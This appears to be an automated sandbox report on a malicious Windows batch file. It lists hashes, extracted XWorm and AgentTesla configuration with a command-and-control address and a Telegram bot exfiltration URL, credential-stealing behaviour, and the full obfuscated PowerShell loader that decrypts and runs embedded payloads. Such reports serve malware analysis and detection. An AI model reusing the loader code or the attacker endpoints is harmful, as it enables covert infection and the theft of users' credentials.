Analysis
-
max time kernel
150s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
24-05-2024 17:46
Static task
static1
Behavioral task
behavioral1
Sample
m16XClientn.bat
Resource
win7-20240508-en
General
-
Target
m16XClientn.bat
-
Size
60KB
-
MD5
322ea0b2359b53869e96a92ce89f0d9e
-
SHA1
c175334e858e2e6761202e7546201b26faefb911
-
SHA256
9eb06cfb9cd881338d93b6e2cad6e6a4bd823c44d0128a047e85fa14f278e76c
-
SHA512
080bb6189372bf55e533923a8f7cad393ecaccccff23ce578efe7104cc76779320faa43aa6b27fc43e63e0ea15f246ff38fccc91b5ebe6c5d4476daabde38c8f
-
SSDEEP
1536:qHRDZwBvoIeYCOoeK9PlcXmmHaoifEJ0SzAw:qHRDZwRN0cXGcJ0xw
Malware Config
Extracted
xworm
3.1
134.255.233.93:7000
OXTS79ak3lwQUaDQ
-
install_file
USB.exe
Extracted
agenttesla
https://api.telegram.org/bot6840755276:AAHEhHpmlrUuXaIUnKpuniBmO-DaNx3tnLo/
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1340-19-0x0000024D51450000-0x0000024D5145E000-memory.dmp family_xworm -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 34 1340 powershell.exe 40 1340 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
yzrfhd.exepid process 4064 yzrfhd.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 42 api.ipify.org 43 api.ipify.org 44 ip-api.com -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exeyzrfhd.exepid process 1340 powershell.exe 1340 powershell.exe 1340 powershell.exe 4064 yzrfhd.exe 4064 yzrfhd.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeyzrfhd.exedescription pid process Token: SeDebugPrivilege 1340 powershell.exe Token: SeDebugPrivilege 4064 yzrfhd.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 1340 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 3452 wrote to memory of 2944 3452 cmd.exe cmd.exe PID 3452 wrote to memory of 2944 3452 cmd.exe cmd.exe PID 3452 wrote to memory of 1340 3452 cmd.exe powershell.exe PID 3452 wrote to memory of 1340 3452 cmd.exe powershell.exe PID 1340 wrote to memory of 4064 1340 powershell.exe yzrfhd.exe PID 1340 wrote to memory of 4064 1340 powershell.exe yzrfhd.exe PID 1340 wrote to memory of 4064 1340 powershell.exe yzrfhd.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\m16XClientn.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3452 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B9b88R1T4CVo1WoTI+/W1BysqGk+qehh5RByOsn7XiU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lcCPo+xF8g8/Cxxizm+V4A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rkxQO=New-Object System.IO.MemoryStream(,$param_var); $FvJOV=New-Object System.IO.MemoryStream; $OPzQw=New-Object System.IO.Compression.GZipStream($rkxQO, [IO.Compression.CompressionMode]::Decompress); $OPzQw.CopyTo($FvJOV); $OPzQw.Dispose(); $rkxQO.Dispose(); $FvJOV.Dispose(); $FvJOV.ToArray();}function execute_function($param_var,$param2_var){ $dLJDy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rrYOP=$dLJDy.EntryPoint; $rrYOP.Invoke($null, $param2_var);}$MGRmn = 'C:\Users\Admin\AppData\Local\Temp\m16XClientn.bat';$host.UI.RawUI.WindowTitle = $MGRmn;$RZrKP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MGRmn).Split([Environment]::NewLine);foreach ($kOWJS in $RZrKP) { if ($kOWJS.StartsWith('vGMencdustGzyGaJrmyt')) { $UphAS=$kOWJS.Substring(20); break; }}$payloads_var=[string[]]$UphAS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2944
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Users\Admin\AppData\Local\Temp\yzrfhd.exe"C:\Users\Admin\AppData\Local\Temp\yzrfhd.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4064
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0yliotz.xwp.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\tmpC238.tmpFilesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
C:\Users\Admin\AppData\Local\Temp\yzrfhd.exeFilesize
248KB
MD583acde7f5c4c56adcc04160a847f6f63
SHA10128a01cb01733e424a8a84ce857708f7f63aa98
SHA25600fec1113446569400004dd1e4def56c4be3ddc15e63cc498a74e6d936dba925
SHA51237fa7843e2848a85821ab64eff5277a207e5c883074e2702acc32c02c6acdf41a9bfbb5fe7dfeaa9609645d73c3b7f40cb00a5d6c9f52c36cdf0ca65ee3480fe
-
memory/1340-17-0x00007FFF15930000-0x00007FFF159EE000-memory.dmpFilesize
760KB
-
memory/1340-13-0x0000024D516D0000-0x0000024D51714000-memory.dmpFilesize
272KB
-
memory/1340-8-0x0000024D511A0000-0x0000024D511C2000-memory.dmpFilesize
136KB
-
memory/1340-14-0x0000024D51720000-0x0000024D51796000-memory.dmpFilesize
472KB
-
memory/1340-15-0x0000024D39010000-0x0000024D39020000-memory.dmpFilesize
64KB
-
memory/1340-0-0x00007FFEF8BF3000-0x00007FFEF8BF5000-memory.dmpFilesize
8KB
-
memory/1340-16-0x00007FFF16C50000-0x00007FFF16E45000-memory.dmpFilesize
2.0MB
-
memory/1340-18-0x0000024D51080000-0x0000024D5108C000-memory.dmpFilesize
48KB
-
memory/1340-19-0x0000024D51450000-0x0000024D5145E000-memory.dmpFilesize
56KB
-
memory/1340-20-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmpFilesize
10.8MB
-
memory/1340-22-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmpFilesize
10.8MB
-
memory/1340-23-0x00007FFEF8BF3000-0x00007FFEF8BF5000-memory.dmpFilesize
8KB
-
memory/1340-24-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmpFilesize
10.8MB
-
memory/1340-11-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmpFilesize
10.8MB
-
memory/1340-44-0x0000024D53100000-0x0000024D53628000-memory.dmpFilesize
5.2MB
-
memory/1340-12-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmpFilesize
10.8MB
-
memory/1340-43-0x0000024D52A00000-0x0000024D52BC2000-memory.dmpFilesize
1.8MB
-
memory/1340-42-0x0000024D527B0000-0x0000024D52832000-memory.dmpFilesize
520KB
-
memory/1340-40-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmpFilesize
10.8MB
-
memory/4064-41-0x0000000074FC0000-0x0000000075770000-memory.dmpFilesize
7.7MB
-
memory/4064-39-0x0000000005190000-0x00000000051F6000-memory.dmpFilesize
408KB
-
memory/4064-38-0x00000000057C0000-0x0000000005D64000-memory.dmpFilesize
5.6MB
-
memory/4064-62-0x0000000074FC0000-0x0000000075770000-memory.dmpFilesize
7.7MB
-
memory/4064-37-0x0000000000770000-0x00000000007B4000-memory.dmpFilesize
272KB
-
memory/4064-57-0x00000000069F0000-0x0000000006A40000-memory.dmpFilesize
320KB
-
memory/4064-58-0x0000000006AE0000-0x0000000006B7C000-memory.dmpFilesize
624KB
-
memory/4064-59-0x0000000006B80000-0x0000000006C12000-memory.dmpFilesize
584KB
-
memory/4064-60-0x0000000006AA0000-0x0000000006AAA000-memory.dmpFilesize
40KB
-
memory/4064-61-0x0000000074FCE000-0x0000000074FCF000-memory.dmpFilesize
4KB
-
memory/4064-36-0x0000000074FCE000-0x0000000074FCF000-memory.dmpFilesize
4KB